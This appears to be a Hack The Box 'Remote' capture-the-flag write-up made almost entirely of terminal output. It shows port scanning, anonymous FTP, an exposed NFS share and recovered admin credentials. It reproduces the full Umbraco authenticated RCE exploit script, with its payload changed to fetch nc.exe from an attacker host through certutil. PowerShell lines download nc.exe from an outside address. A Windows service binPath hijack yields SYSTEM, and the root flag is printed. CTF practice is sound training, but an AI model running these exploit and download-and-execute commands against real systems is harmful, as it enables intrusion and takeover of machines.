Hack the Box - Remote
Nmap
111
111端口资料
wmic 命令资料
Get ROOT
kali@kali:/var/www/html$ nmap -v -A 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-18 11:51 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Initiating NSE at 11:51
Completed NSE at 11:51, 0.00s elapsed
Initiating Ping Scan at 11:51
Scanning 10.10.10.180 [2 ports]
Completed Ping Scan at 11:51, 0.17s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:51
Completed Parallel DNS resolution of 1 host. at 11:51, 10.34s elapsed
Initiating Connect Scan at 11:51
Scanning 10.10.10.180 [1000 ports]
Discovered open port 111/tcp on 10.10.10.180
Discovered open port 80/tcp on 10.10.10.180
Discovered open port 445/tcp on 10.10.10.180
Discovered open port 21/tcp on 10.10.10.180
Discovered open port 135/tcp on 10.10.10.180
Discovered open port 139/tcp on 10.10.10.180
Discovered open port 2049/tcp on 10.10.10.180
Increasing send delay for 10.10.10.180 from 0 to 5 due to max_successful_tryno increase to 4
Completed Connect Scan at 11:51, 23.06s elapsed (1000 total ports)
Initiating Service scan at 11:51
Scanning 7 services on 10.10.10.180
Completed Service scan at 11:52, 54.54s elapsed (7 services on 1 host)
NSE: Script scanning 10.10.10.180.
Initiating NSE at 11:52
NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
Completed NSE at 11:52, 8.94s elapsed
Initiating NSE at 11:52
Completed NSE at 11:54, 97.89s elapsed
Initiating NSE at 11:54
Completed NSE at 11:54, 0.00s elapsed
Nmap scan report for 10.10.10.180
Host is up (0.17s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_04-18-20 11:19AM 33 readme.txt
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -15m12s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-04-18T15:37:32
|_ start_date: N/A
NSE: Script Post-scanning.
Initiating NSE at 11:54
Completed NSE at 11:54, 0.00s elapsed
Initiating NSE at 11:54
Completed NSE at 11:54, 0.00s elapsed
Initiating NSE at 11:54
Completed NSE at 11:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 195.61 seconds
kali@kali:/var/www/html$ searchsploit umbraco
-------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Umbraco CMS - Remote Command Execution (Metasploit) | exploits/windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | exploits/aspx/webapps/46153.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting | exploits/php/webapps/44988.txt
-------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
kali@kali:/var/www/html$ ftp 10.10.10.180
Connected to 10.10.10.180.
220 Microsoft FTP Service
Name (10.10.10.180:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> put ~/Desktop/nc.exe
local: /home/kali/Desktop/nc.exe remote: /home/kali/Desktop/nc.exe
200 PORT command successful.
550 Access is denied.
ftp>
111
111端口资料
kali@kali:~/Downloads$ /usr/sbin/showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
kali@kali:~/Downloads$ sudo mount -t nfs 10.10.10.180:/ ~/Download/test
kali@kali:~/Desktop/test$ ls -al
total 92
drwx------ 14 kali kali 4096 Apr 12 09:33 .
drwxr-xr-x 3 kali kali 4096 Apr 18 11:57 ..
drwx------ 2 kali kali 4096 Apr 12 09:33 App_Browsers
drwx------ 7 kali kali 4096 Apr 12 09:35 App_Data
drwx------ 6 kali kali 4096 Apr 12 09:11 App_Plugins
drwx------ 3 kali kali 4096 Apr 12 09:11 aspnet_client
drwx------ 4 kali kali 4096 Apr 12 09:12 bin
drwx------ 6 kali kali 4096 Apr 12 09:12 Config
drwx------ 2 kali kali 4096 Apr 12 09:13 css
-rwx------ 1 kali kali 152 Apr 12 09:33 default.aspx
-rwx------ 1 kali kali 89 Apr 12 09:33 Global.asax
drwx------ 18 kali kali 4096 Apr 12 09:13 Media
drwx------ 2 kali kali 4096 Apr 12 09:13 scripts
drwx------ 23 kali kali 4096 Apr 12 09:30 Umbraco
drwx------ 27 kali kali 4096 Apr 12 09:33 Umbraco_Client
drwx------ 4 kali kali 4096 Apr 12 09:33 Views
-rwx------ 1 kali kali 28539 Apr 12 09:33 Web.config
Administrator admin b8be16afba8c314ad33d812f22a04991b9 baconandcheese
Administrator admin@htb.local b8be16afba8c314ad33d812f22a04991b9 baconandcheeseExploit:46153.py
kali@kali:/usr/share/exploitdb/exploits/aspx/webapps$ cat 46153.py
# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# CVE: N/A
import requests;
from bs4 import BeautifulSoup;
def print_dict(dico):
print(dico.items());
print("Start");
# Execute a calc for the PoC
payload = '\
public string xml() \
{ string cmd = "/c certutil -urlcache -split -f http://10.10.14.152/nc.exe c:/windows/temp/nc.exe"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
proc.StartInfo.FileName = "calc.exe"; proc.StartInfo.Arguments = cmd;\
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
\
';
login = "admin@htb.local";
password="baconandcheese";
host = "http://10.10.10.180";
# Step 1 - Get Main page
s = requests.session()
url_main =host+"/umbraco/";
r1 = s.get(url_main);
print_dict(r1.cookies);
# Step 2 - Process Login
url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
loginfo = {"username":login,"password":password};
r2 = s.post(url_login,json=loginfo);
# Step 3 - Go to vulnerable web page
url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
r3 = s.get(url_xslt);
soup = BeautifulSoup(r3.text, 'html.parser');
VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};
# Step 4 - Launch the attack
r4 = s.post(url_xslt,data=data,headers=headers);
print("End");
start powershell $client = new-object System.Net.WebClient && client.DownloadFile('http://192.168.11.128/nc.exe', 'C:\Users\Administrator\Desktop')
cmd.exe /c start powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.11.128/nc.exe', 'd:\nc.exe')
c:\Windows\Temp>sc stop usosvc
c:\Windows\Temp>sc config usosvc binPath= "C:\Windows\Temp\shell.exe"
c:\Windows\Temp>sc qc usosvc
sc qc usosvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: usosvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : c:\windows\temp\shell.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
c:\Windows\Temp>sc start usosvc
wmic 命令资料
Get ROOT
C:\ftp_transfer>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>type root.txt
type root.txt
7d8e627497ee8db2e6da125746e6ddd5
评论
发表评论